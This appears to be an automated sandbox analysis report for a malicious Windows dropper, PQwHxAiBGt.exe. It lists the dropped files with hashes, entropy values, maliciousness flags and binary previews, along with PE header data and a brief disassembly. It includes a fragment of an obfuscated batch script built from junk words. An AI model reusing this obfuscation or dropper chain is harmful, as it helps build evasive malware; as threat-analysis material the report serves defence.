                                                                                                  Preview:|.uER...b.....Tl.....in.Q1...|.L.M..8.U.`{b.N+.P... ........C.>.:?4GJ.N.)q.A..'.W..l.k.....$..G.@\.GB.).....{.B....HX..B..\,...u..k.n.../u.|.n.L~.Q.....vz....sJs.61.......N..Y.q... .....+z~]........K..B....p{...............k.._;Ke_..=C..,..S.L. >....Vl..?.......P..*TA.g,t.:)....p..fF.I.@l..W.|%..[....^d...j..v..........!.g....*].z..]....(x/...0Wn.......8.9t.#-.,...Z~.A..x... .U..o.wp ..vi...r.&...a.n..Wr....@...!.kL....og..I..1.bq.W.ej.9..{.;.W..O{.....\!.Q.+.?o.)tMS..A..V..}. S....W......"...7y..F...pj.A....._,3..D2..;..?...;._..C.@.........D.b...IZ..^...Ys(.k.v.Z..$=~"".^n.|..(.i...]..w.............X.]C.q.....r.\c......@..../.w.vP......kU7...Jcp..O=s.kX...n.,k*...7c...K.....1..B.1.E.....U/(...8...x....r.....{.Z.M"...z.`.z....uD.s........}}UV...H.H2G.C.N!9.RGU....a..>!..W.Wb....y=....*.'...%..$8..3.bL.5.n...JS.^.7.]..#g.&.!Z...6n^|oZ.r..6s... ..D.+.$.@.\]e.....o...-.}~.S.<...6........../....T.....qG.E.*.n....Q..<..p.....a.>..n.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):100352
                                                                                                  Entropy (8bit):7.998191706352116
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:1YAdAfoZKeVtyLmqyCHW67StLCfuO9oKouokyFEPGYwEYZu9ukZl23DBRl0:KAyfoxtDqTH4ZCf5LpoyYZu9zlW7m
                                                                                                  MD5:56F46FE661AFC27893A1DAE49C072A8D
                                                                                                  SHA1:DD4943722397F224A4DC829D95F65A32B992183C
                                                                                                  SHA-256:E06C3B85DF7467060EFB7688E9CACE3E50DE00B61D696423D9A4C15D43A90611
                                                                                                  SHA-512:2807A6DF558509871EB0F471221238F610EB9FF54C6B01CE6B14ED900C107AD0E0AD37814B8479C3B1F4160F342C17497FC40B9A772CE052DCF236AC4E1B3E17
                                                                                                  Malicious:true
                                                                                                  Preview:...v?f.o.@2n...x.=uih/.}..K|.V..KM;.'4v;k.u3b.Al.CB>/....TYo...Jr.W.K.!@S..J..^.....$...i...K....b."..B.v....F..#..l.a..RM..e;^i...=T.q.ox# ...".9p..A..S.'.%e.2`.Es.u.].(..1..5.:/..K=F......|f../!.....$F........H...5..|)uv......a.#Q..s.M..^..p../..nN.8h........k.H...)L.q...y<f...-.$G...T....Y.*..7..W..Z..$.h*...b_7Z.{5.c..]]n.....nG..o39'2.$e...UbXe.m.....;..wuZ.\R.l...q(8u..."..........(.B.&!J.........M..~.M%....W.....O..~...h...H...@".....m`j...4....eF.x}.\~_../....4....0.>.2.....@Xn..........0d...gE)....$..P............i._...Y.........7..sp.......n.....3.WKD^..f.....P.p......6..f~na.f.......[.~1/..PR.9r..._.]..!&..4ntK..1...... R.>....)..g9.ap?.E..w^..0.........Q.b.E.i..u..%.S....m........|....U1zW.d...t.Z.h.B.)...(..#..TY,...'M)`Y.8;.8VXM...F..x.:....;k.k.S.pI....C}P..R..:..8v..8.......2.......z...).......k....o....D.L.&.w.R..K^..G*......)T..G]..D}.x...?.&.Ai..Q(.WJ.M.*.?L.n..wi..X-5....T.^.>..;...W.P.h&~....&..!.....-x....bJM=E1
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:ASCII text, with very long lines (1406), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19403
                                                                                                  Entropy (8bit):5.092419745919344
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:RTMLb3hFYHPKmvaPvLONT17+zdzCZhDbkDwHG:RTML+YONT1qpeZpkt
                                                                                                  MD5:EE68F5CBBB21E9957FDAD10000C8D81E
                                                                                                  SHA1:0D08D10C15D2134B2C741BBBB612DB3AEADC7C4A
                                                                                                  SHA-256:D325ADFB96D434D3DD5B5489D921B39C91EBECB85EB1F1C662D4C3C53D402208
                                                                                                  SHA-512:02C5C3DF2734979D6B058E213A005540D907B41357BD3F9F1ECE63885905AAC31BCBCE085D7EF1E03AEECDF862E7A1A277A5B34180B2C071A54C363E47B277E4
                                                                                                  Malicious:false
                                                                                                  Preview:Set Orgasm=C..ekHandheld-Urban-..mWHRBrown-Casinos-..NDnTPrison-Epa-..raaZMagical-She-Evidence-..btrFeeding-Spray-Syria-Produces-Diary-..Set Television=0..AqpProminent-Mechanism-Hispanic-..rgZeWyoming-General-Sc-Epic-Kentucky-Function-..giMArtistic-Shift-Thirty-Victory-Cinema-..zLtZen-Radios-Subdivision-Corporate-Dog-Banking-Proposals-Papers-Integration-..mRHispanic-Pizza-Unlimited-Mx-Revision-Co-Put-Fiction-..hJjPerson-Investigate-Myanmar-Media-Trademarks-Drops-Viking-Notices-Yahoo-..Set Sustainable=J..aHxInnovations-Fossil-Emerging-Participated-His-Cheat-..fDEIVoices-Mai-Kenny-..WFFgOnline-Innovations-Joyce-..hwyLRequire-Pl-Team-Dash-Rays-Appears-..ZKQCondos-Plymouth-Fairy-Config-Cotton-Bookstore-Creature-Earth-Morgan-..NwySoviet-Tomato-Side-..Set Sufficiently=c..kWEnable-Spirits-Commission-Operational-Dream-Config-Juice-Approach-..NPContribution-Ieee-..RScEmma-Season-Ballet-Conducting-Testimony-Robertson-Held-Cut-..TKwFChris-..yqDamages-Migration-Reputation-Drinking-Printers-Appreci
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:ASCII text, with very long lines (1406), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19403
                                                                                                  Entropy (8bit):5.092419745919344
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:RTMLb3hFYHPKmvaPvLONT17+zdzCZhDbkDwHG:RTML+YONT1qpeZpkt
                                                                                                  MD5:EE68F5CBBB21E9957FDAD10000C8D81E
                                                                                                  SHA1:0D08D10C15D2134B2C741BBBB612DB3AEADC7C4A
                                                                                                  SHA-256:D325ADFB96D434D3DD5B5489D921B39C91EBECB85EB1F1C662D4C3C53D402208
                                                                                                  SHA-512:02C5C3DF2734979D6B058E213A005540D907B41357BD3F9F1ECE63885905AAC31BCBCE085D7EF1E03AEECDF862E7A1A277A5B34180B2C071A54C363E47B277E4
                                                                                                  Malicious:false
                                                                                                  Preview:Set Orgasm=C..ekHandheld-Urban-..mWHRBrown-Casinos-..NDnTPrison-Epa-..raaZMagical-She-Evidence-..btrFeeding-Spray-Syria-Produces-Diary-..Set Television=0..AqpProminent-Mechanism-Hispanic-..rgZeWyoming-General-Sc-Epic-Kentucky-Function-..giMArtistic-Shift-Thirty-Victory-Cinema-..zLtZen-Radios-Subdivision-Corporate-Dog-Banking-Proposals-Papers-Integration-..mRHispanic-Pizza-Unlimited-Mx-Revision-Co-Put-Fiction-..hJjPerson-Investigate-Myanmar-Media-Trademarks-Drops-Viking-Notices-Yahoo-..Set Sustainable=J..aHxInnovations-Fossil-Emerging-Participated-His-Cheat-..fDEIVoices-Mai-Kenny-..WFFgOnline-Innovations-Joyce-..hwyLRequire-Pl-Team-Dash-Rays-Appears-..ZKQCondos-Plymouth-Fairy-Config-Cotton-Bookstore-Creature-Earth-Morgan-..NwySoviet-Tomato-Side-..Set Sufficiently=c..kWEnable-Spirits-Commission-Operational-Dream-Config-Juice-Approach-..NPContribution-Ieee-..RScEmma-Season-Ballet-Conducting-Testimony-Robertson-Held-Cut-..TKwFChris-..yqDamages-Migration-Reputation-Drinking-Printers-Appreci
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):947288
                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):63488
                                                                                                  Entropy (8bit):7.99689152680788
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:Et/mTGibcoViIseRuDAjW6iLAxjh/coXdARkntiYslL1wTv1:aLTIrbtCA5yoJntiYkwTv1
                                                                                                  MD5:1CF4671CD0018A3EABDC8E0948DA8994
                                                                                                  SHA1:84E45FB877D3128C015234761DAB8FB350668FCA
                                                                                                  SHA-256:0E062BC6DCFC6CFBD254025F843F4EF6E136F7A5605C586332D42502D1B9EDA6
                                                                                                  SHA-512:1D831A0F1D883002BCF35849B6D53A1A987A2672B9CE01276BA48D8B5AF74E7052D8BD902F5782374B34095D8E50245BD691DB3E8354CA65AFEAD08AD919E54E
                                                                                                  Malicious:true
                                                                                                  Preview:b.a......ZE.....d%.VP.P..S9O=n...k.R=..$?@....v.vf.......Y.W. ..u.>}...Z.....r.....R..].Y.........s......b....#3..eL.8c.M..UO.....%....,.I/..ehaC..O.\P..c... &....y..*..4.`'..Y@...<.S.}.G...Jw........J^. ..V..0..A.RM.CE.)J.iYo#..+..R.W..Y.z~....9.#..Xf..3.".q.})4|..L#E.;..p6..M..a..NTr....r..x...bY......[...A......j^ ........Et./9.o.~.....T...R.dl.._..b..{.......VD<._#.4x.L..o..GX.l..*I<.L.&...|..|.O.0...`.. .....8..@o..>.....$q.3.....Q..j.c..[.(.....kl.&-..=Y.I....!9.]X...VY".._bT.u.J..VyK.~u?E*7....!D....@.f...-Y........P..2]..F.S...).w.%`^h2l..4....?J&i.\.9Z7.\rh...v...Q.....e6..6..z.%.(.^.......F.~.o.|.B|.....Z";<T..c...x....'L......X.`...........G.....4...v.B..C" ..9......I..<..........m<...........`...R}.1\.......9....+k...&..e.(.0-w.....nRmU0.I#.}.5x....!.!Y.z.9.........^"s.....LI.(...+r..DU.%..^.2..q.<...0...........+.-s>Fs...n..XJ...wp..@oNeLy..p{S/S.\dk...An...f=...N....G..y4.\.B.iE....E.N._.....I....x.@..z.....T.i..&ZV..o}N..u.?.{3
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59392
                                                                                                  Entropy (8bit):7.99693237584807
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:avIbd7M1sbtJjNrFQBsifWvsVcyjk3KR36nPZu5sDGkk0:mIbd7JBXrFQBcxyY3A3qu5sJk0
                                                                                                  MD5:5DF2524F3875CE07512AE0E09BD6882B
                                                                                                  SHA1:BEDB7C2A6BEBB8942CB3C2B5DAEE7D0618B1245D
                                                                                                  SHA-256:F546A20836F69ED063FCFD61F7144AA99ECB9F9419F1BB8F783CFAF2A9E44A6C
                                                                                                  SHA-512:A931A321BB2511A34723300C3860293228C4F4D92B343907E05B2AF7425F8C063D289F674C94612A60B848EF197C65341840F0B72361D4ABFAC18D3D34E3956A
                                                                                                  Malicious:true
                                                                                                  Preview:.;A.Z...m...8.T.M.Y...<...}.gD4n.`......pf.q.....A.HB.UM.P......&.I...z@..].{bX.b..9.KH.....3.....t..t........e.\y...Br..gM^YaQ....`BP.bC.sa.Kpl..k..R..~.u.J(....W..vm/Y....r...p gS...B-:..W...,2&...Z.x..-.c...#.j..M.a..7.=..~......x.e..R.a.AS..,..y1..%#~..O<.q..@+rV.Gj.Q..,...L.v.....%...@u..*.E.y.d...>......j..#R...w..?Yo.7vL;!9G.'......=..._..L....R...j...@..s@...4.A.]..|/.K..0.V..P_.q.......YM.c.c..h.G.zy.1..`.;....mE..\..D.l{3..|...DO.G.6=~......;....h...D..l...0E.Q..#FQ...n....o}l..gD.c.&.....L.E.q.E.U._.....N.e.bh|..[b.~q..$D....2....2.y...`.x...C.....B.i'..{....?.u,.S?....m.L:.`+a...x\.$....bE.w..E.e..&..+.6{..E.u. ..u.%...f..T.Z~.ac).M.N..Xp....!i......]..|=...l.[.Q....OI......x...3......c.B..'..R0.-h.D.+...94.y.?...@...Rn.y.X....BT..,.".]......K..9[M.O....2AgZ.e.....Ue.W..qE.Kd....m.!...y...BR.j.eu.Ss..:e..<..mi...e..>..4.UW..t........./......B...G..J.$.+...}.s.^.B{..u.\.R.[..9/.qa>5..'...g..F...9......Sq.j..y...&.#......
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):95232
                                                                                                  Entropy (8bit):7.99798135852855
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:IRkCwJhiNhdZ/pyr0os2ic0c1qSlMTn9MRCVZcgHd8acONt6kEaSa6A38jpNTbvz:IRlwJhAdZRnvc0ccSlMTn9MRCVZLHdZg
                                                                                                  MD5:AE21039DF4668DEFCC1613245DD2A0BA
                                                                                                  SHA1:E47E06D4E08DC7F582CD57DECA7F621E7C154890
                                                                                                  SHA-256:7F6A83B3A2A4F860CE8974E390DF851C8D371562DEA3DA4703B614A6EC8F55D4
                                                                                                  SHA-512:61BAFB1E9EA0F840A3558AD765B2EE4DC10FF0D41C894682781302B86F57758DF9BFF5AAF93C624B0B075B748336ABA30AEBBA3BF893154791D2BF6D97CE8813
                                                                                                  Malicious:true
                                                                                                  Preview:.*........BK.3..$1O..t..j.T....HAz..Zf|..z.....`..?4u[id^..pD.2.'Y....B.J........U.7qp=.Ah....?Z.s.=?....y.|..1.:..0.....c...jB...y..J\i<.F.+..........=.[k.o...B*...}..I.U.?+.yQS .. -pxT-.......<.....#?.....LP&..e.>...W...K@...Unk......D.gx......i..`....K".]|<..8X.>0...%VE....>..I..|[.....@...]V.G)...'....aq..{[2^vp...s..'.qJ..W..D............q2..@.W... ..a..;Q.[...y..b.w0,r...n%..z..7bI..Y..r.R..)..o......|.q4*m_z4.4......'.N...;/.c9..ssU.V.K.:6.b..A4......2..alRz...Rp.g.KY.c>.N........4SKs.......'kq\..o....u)...\...f.....^~/..>.#..Z.....t@.J.g..&.#Z...L{...@.5..Rc7.K...T...PA..w:...N.:P.7q.....e....fL..(y......}k..[........)4i..L.Z.....V.e..U6/.u&.Z.Og..b...{.\.A...(.... ..{....D..s...|8..j.QN....I.v.O*.!2U..YZI....t......s....B#.Z:...Tx..S.._fL..D.....bN..H(.<{/!.j.y...M...x~...ejC....}.........G.L.T.......+.U..2A* .........".&.A.{..6......m....+sh..6.........Y........+ ...l....'i..'.kM9..=ZT.Q.J......xQ....7itf......}.\F.k.Nf.....PC
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):89088
                                                                                                  Entropy (8bit):7.9979171791276595
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:NEIUXqdh9pCqIAMiiKXwVVvp9u5mLOZUClCuIG3jmyNGbENIBDCjzUd0wG6qix:NZU6WqIAMihXkVS5lZUCkuZVAYNoCjz+
                                                                                                  MD5:84B1FC50C592D410A85F7285835920FC
                                                                                                  SHA1:840F948D9824508F48515A7931EC8FE0A1F7F0F0
                                                                                                  SHA-256:B40D393A690DD7706C5793D255BD7EE625E8BFE785EF6ADA2AF7266F6D23CF6F
                                                                                                  SHA-512:36087A0862E20AFAB4734AA61F2EF0AF6B6C047BC2A660F34A353AEC6C3CCE8B67D7B57F116D5E40A4D171B8A44F3F97D885C6028D7977A2E610C146620CC18E
                                                                                                  Malicious:true
                                                                                                  Preview:Z.b>b......&...".Ws*.............[.........8.G3v60...~...U.p.9P.7Jh......)...*).!.>._.X#v..S/.N....F."g.........F..g...&.c8.DOm..%...c...m.Ut..Y...8,.B#........... CK....vW...jA..n8B.(W5z..j..y*wmZ.....1..7.m..uO.&K..wR.................*..G.C.`..R..L...!..?Oe.|...E.J..P....gX'.G..~.T....2r..6.N).y.]..t..j!....Uw.l..VS..R.-l.z\.c..E...F4.....^a..v..&]...v./.? *.....v..Il..<...Q.s.......(.L....|.i...J.$C...E+.K8.R...}...O.a.y./...e..-.v...V.s.L..Q....N<.G.K...Y...."...........(nQ.0".n...S.HG..eC`...[HWw...q..2...e.[..y..KAL.......)..`/...0|Q......9.%...4...0.h.x.,V9....'....I$.!P.S..L|3.i.UWI.Z...jr..a_....m.|.jH../.6!..,.{Q.T..Aa.......W8..[.\|.W..a........1..e. .. ..*B...x*].........T.,....7pH.0.........O.P..(._.Ua..KW2..E5.J..]...<.)."4...._Q7..........8$..m.,}s....u..l..cH..,.T..4Up.n...k:..s......i.;v..}....v&w..z......,g.(...D.Eg..+...m_U%.,.n.R..+.;9+.eS.-0f(.G0kG.5..T9Z..LMb&..3.#...K(..#.....L.QCUZj>S..kC...!g..Ak......H.....
                                                                                                  Process:C:\Users\user\Desktop\PQwHxAiBGt.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1768792
                                                                                                  Entropy (8bit):7.993164405555776
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:24576:OfdnQ3ksSfu03GwiL4Nv7x9RiDew+d3hjqDWg4CC8girDW5F91anxjE+AXg5hUza:33wR3GgNv7bRpw+LuZC89y9ME+4l4FL
                                                                                                  MD5:9E17536C65B31B33BE6F5840E3945407
                                                                                                  SHA1:7E4DECDE1408BB9ACE598FB80F5F7A577F261208
                                                                                                  SHA-256:C633D62F8EB5EB1D570236C4F7B263DA91AAC702781D39D455C2553F83ED0149
                                                                                                  SHA-512:5F9DBCCF2344E281DE025C410046B9EC7CF690253292754275D9C49B9BC86ACE605127313EAC6CE55289BBD3BCFC886F21ACDC522D21B64F22BBB4CB905E8268
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.................................y.....@.................................4........@...+......................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....+...@...,..................@..@.reloc..2....p......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):63488
                                                                                                  Entropy (8bit):7.9970580637829585
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:x2xsBWwwMCep7wJLUp686KCRFCSx48pbWTsovp:8sB5nwRm6xKvSx4cWTN
                                                                                                  MD5:43C5FEA776CA6EA890DF49366F9471B2
                                                                                                  SHA1:244B83BC389AE798F70765F774ED01FD09E68344
                                                                                                  SHA-256:628427F1013D8F05DC10074B5288FD4E7DDED6985406952AE3CAD2693C6E3EF5
                                                                                                  SHA-512:F1AA393534C4EB46BAAABBD2DF503FA1F9C20588AA4F039432C5D58A8CD0CCB34663F17FBF001CEB845B1A65DE2FB6D2C9805A47BCB9E967027474748CC74069
                                                                                                  Malicious:true
                                                                                                  Preview:.).5v..bz.U....:..!..#`.-`...s..OO.!.niw0...o.N]..%e.?....H....i.M..m....r.|..n1R.....5Y.fS/."........[..%=.:&z..g6\A..=....6z...u...AzO..w.....PT..L.#...c.Td@-^V.....&..K..j.l...%..|.R.O..h...It.s..`i.0?q.;WC..9~.dk..]...GS...S.........<_H....[..o..........|.`n....^...y....`.N..m..^?..&......f.B...B_G .o.._...\yr}...48...I...w....+..=........o($.Ihv....OU..../%.MN..a8~....`:...LD.6....K.......!.@..0.[...X.{..P........r.e..G.V&..E.KM......O.?..(:..N1uB.x.V.....r.s.....K...\.G....\h....,...l...%...Ar..%|.:.......N....?.....FR..<....=...E...V.:.6.....11....T.6.b.+.:..c.j...SF...D.(Q..j..2<.$...o9...{HW@o....`R....y.3...-b...q....HYC..R..T...;.....K`....*..t..&.85.3g..H..P'.~...LL.eq..3.1.6..).i.....k..T....C~s.f...:.4..V...'s....$..HF...|.:..e(......Y..F...BEJ.|O..X.....q...R.e`......8.....:d..<.(<..f3N." ..I.L.K....MV.&.}....<.(..7..)..d.7..W.D1..2.c2@D.$...$.5#<ZtG.[.5...-.%.Sk.:A..N...b.*.......6$.qSP...!5.=b....}..V;....1.5.. si..i.8/..Y... !R..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\setup.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3102720
                                                                                                  Entropy (8bit):6.376255476158853
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:uxKQUpqBdzGssUvdmPBlZCT8ZazLNAyZZ8/:IKgPvAlZCTmadTZZ8/
                                                                                                  MD5:DD78675858275301D48256D22D52CA74
                                                                                                  SHA1:CA7116D71C2C2AEBFA0E7CDA037B234AB077569C
                                                                                                  SHA-256:7DC0387B2E8A0971FF41B1F55DF2E8EBFE4D8BB29F22C87FBE193E45E614AC67
                                                                                                  SHA-512:C76F2D8BB831B1F9106D41BB7C9FCE4741428C872174367381A852CEEA7799B568FE054FBE8CB9B44596FB77E6719443C11DAA1168841E1EDB9B81EF00C5B219
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`...............$.....T/...................@...........................3......&...@... .............................. )..1....)..-....................2.............................0........................')..............................text... ...........................`.P`.data...$A.......B..................@.`..rdata..............................@.`@.eh_fram`x.......z..................@.0@.bss....d....P%.......................`..idata...1... )..2....%.............@.0..CRT....8....`)......L%.............@.0..tls.........p)......N%.............@.0..rsrc....-....)......P%.............@.0..reloc........2......~..............@.0B................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\PQwHxAiBGt.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2120260
                                                                                                  Entropy (8bit):7.236328750029754
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:J4nXubIQGyxbPV0db26AIyZZ64KpWjfGyWOXBcSrxxCFrM0rZbi0ktFV9pDif9g:Jqe3f6XyZZPxjDu3wsZbiDtT9sFg
                                                                                                  MD5:9DEF78C3562D533C530706BA4A2D1277
                                                                                                  SHA1:0087B79339174145D4756D5CD5804149F1FDF416
                                                                                                  SHA-256:A508CCE5CA80306883756B03E7EF0DC3C7915774FE0F2F5C8FD4F5BED73533D0
                                                                                                  SHA-512:FD8DDA7B344F706AF7A7F1C2AB209C452D6A27181B57FAACFF81B88E0D54EA29ACB319C85B70F1D455B8CCA63DC4BC0B4CEAFA3C8A446FD4E78E1AFFA57ABDE0
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...n.._.................P...(.......^.......p....@..........................P......}.....@......@...................@....... ..6....p.......................................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.482082978340432
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:PQwHxAiBGt.exe
                                                                                                  File size:5'276'672 bytes
                                                                                                  MD5:2f0b358d17ffaf3d1f36eb992003fc68
                                                                                                  SHA1:e65fa958100ec8bf4773946c2cd9fa8cd9c5b6d7
                                                                                                  SHA256:61151df093ebef01768789ead98ed2ed73ef951162414101b25a9db8129491a3
                                                                                                  SHA512:52e4238bef4581aca69c362ef2b8e9d8ec59d6d5d9ae7b6250ead043b88da1df7fc85e7dddbcd37b4d19ebe8409fc2337200e8de470655415492c3996a22b128
                                                                                                  SSDEEP:98304:/mTAr1SiCZZZqwspiDsFM3wR3Zt7bjZuu9+CkrK2:/AAr0ZZZqwebMe78u9+Ck
                                                                                                  TLSH:E036D04AF2815179D85A37F01037A7228A366D085319CFAB83F07915EFB7693DD3A60E
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..t...'...'...'..d'...'.j.&...'.j.&...'.j.&...'.j.&...'...'...'.m.&...'...'...'.m.'...'.m.&...'Rich...'........PE..L....ABg...
                                                                                                  Icon Hash:c6f44b89b4534b07
                                                                                                  Entrypoint:0x4ec946
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x67424110 [Sat Nov 23 20:54:40 2024 UTC]
                                                                                                  TLS Callbacks:0x48cb70
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:6
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:6
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:6
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:45791cb8011f54a050d2b23ecfdb3e25
                                                                                                  Instruction
                                                                                                  call 00007F12FCAE899Ch
                                                                                                  jmp 00007F12FCAE8409h
                                                                                                  push ebx
                                                                                                  push esi
                                                                                                  mov eax, dword ptr [esp+18h]
                                                                                                  or eax, eax
                                                                                                  jne 00007F12FCAE85AAh
                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                  mov eax, dword ptr [esp+10h]
                                                                                                  xor edx, edx
                                                                                                  div ecx
                                                                                                  mov ebx, eax
                                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                                  div ecx
                                                                                                  mov edx, ebx
                                                                                                  jmp 00007F12FCAE85D3h
                                                                                                  mov ecx, eax
                                                                                                  mov ebx, dword ptr [esp+14h]
                                                                                                  mov edx, dword ptr [esp+10h]
                                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                                  shr ecx, 1
                                                                                                  rcr ebx, 1
                                                                                                  shr edx, 1
                                                                                                  rcr eax, 1
                                                                                                  or ecx, ecx
                                                                                                  jne 00007F12FCAE8586h
                                                                                                  div ebx
                                                                                                  mov esi, eax
                                                                                                  mul dword ptr [esp+18h]
                                                                                                  mov ecx, eax
                                                                                                  mov eax, dword ptr [esp+14h]
                                                                                                  mul esi
                                                                                                  add edx, ecx
                                                                                                  jc 00007F12FCAE85A0h
                                                                                                  cmp edx, dword ptr [esp+10h]
                                                                                                  jnbe 00007F12FCAE859Ah
                                                                                                  jc 00007F12FCAE8599h
                                                                                                  cmp eax, dword ptr [esp+0Ch]
                                                                                                  jbe 00007F12FCAE8593h
                                                                                                  dec esi
                                                                                                  xor edx, edx
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebx
                                                                                                  retn 0010h
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ecx
                                                                                                  lea ecx, dword ptr [esp+04h]
                                                                                                  sub ecx, eax
                                                                                                  sbb eax, eax
                                                                                                  not eax
                                                                                                  and ecx, eax
                                                                                                  mov eax, esp
                                                                                                  and eax, FFFFF000h
                                                                                                  cmp ecx, eax
                                                                                                  jc 00007F12FCAE859Ch
                                                                                                  mov eax, ecx
                                                                                                  pop ecx
                                                                                                  xchg eax, esp
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  mov dword ptr [esp], eax
                                                                                                  ret
                                                                                                  sub eax, 00001000h
                                                                                                  test dword ptr [eax], eax
